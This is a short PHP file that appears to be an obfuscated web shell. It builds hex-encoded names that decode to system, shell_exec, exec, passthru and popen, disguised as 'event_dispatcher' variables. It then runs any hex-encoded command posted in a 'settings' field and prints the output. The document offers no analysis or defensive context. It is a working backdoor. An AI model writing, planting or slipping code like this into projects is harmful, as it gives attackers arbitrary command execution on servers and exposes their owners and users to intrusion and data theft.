<?php


$dat1 = '79';
$dat2 = '74';
$dat3 = '65';
$dat4 = '68';
$dat5 = '5f';
$dat6 = '78';
$dat7 = '63';
$dat8 = '72';
$dat9 = '75';
$dat10 = '70';
$dat11 = '6e';
$dat12 = '73';
$dat13 = '6c';
$dat14 = '67';
$event_dispatcher1 = pack("H*", '73'.$dat1.'73'.$dat2.$dat3.'6d');
$event_dispatcher2 = pack("H*", '73'.$dat4.'65'.'6c'.'6c'.$dat5.'65'.$dat6.$dat3.'63');
$event_dispatcher3 = pack("H*", $dat3.$dat6.'65'.$dat7);
$event_dispatcher4 = pack("H*", '70'.'61'.'73'.'73'.'74'.$dat4.$dat8.$dat9);
$event_dispatcher5 = pack("H*", $dat10.'6f'.'70'.$dat3.$dat11);
$event_dispatcher6 = pack("H*", '73'.$dat2.$dat8.$dat3.'61'.'6d'.$dat5.'67'.'65'.$dat2.'5f'.'63'.'6f'.'6e'.'74'.$dat3.'6e'.'74'.$dat12);
$event_dispatcher7 = pack("H*", $dat10.'63'.$dat13.'6f'.'73'.$dat3);
$settings = pack("H*", $dat12.$dat3.'74'.$dat2.'69'.'6e'.$dat14.$dat12);
if (isset($_POST[$settings])) {
    $settings = pack("H*", $_POST[$settings]);
    if (function_exists($event_dispatcher1)) {
        $event_dispatcher1($settings);
    } elseif (function_exists($event_dispatcher2)) {
        print $event_dispatcher2($settings);
    } elseif (function_exists($event_dispatcher3)) {
        $event_dispatcher3($settings, $tkn_val);
        print join("\n", $tkn_val);
    } elseif (function_exists($event_dispatcher4)) {
        $event_dispatcher4($settings);
    } elseif (function_exists($event_dispatcher5) && function_exists($event_dispatcher6) && function_exists($event_dispatcher7)) {
        $object_pgrp = $event_dispatcher5($settings, 'r');
        if ($object_pgrp) {
            $item_itm = $event_dispatcher6($object_pgrp);
            $event_dispatcher7($object_pgrp);
            print $item_itm;
        }
    }
    exit;
}
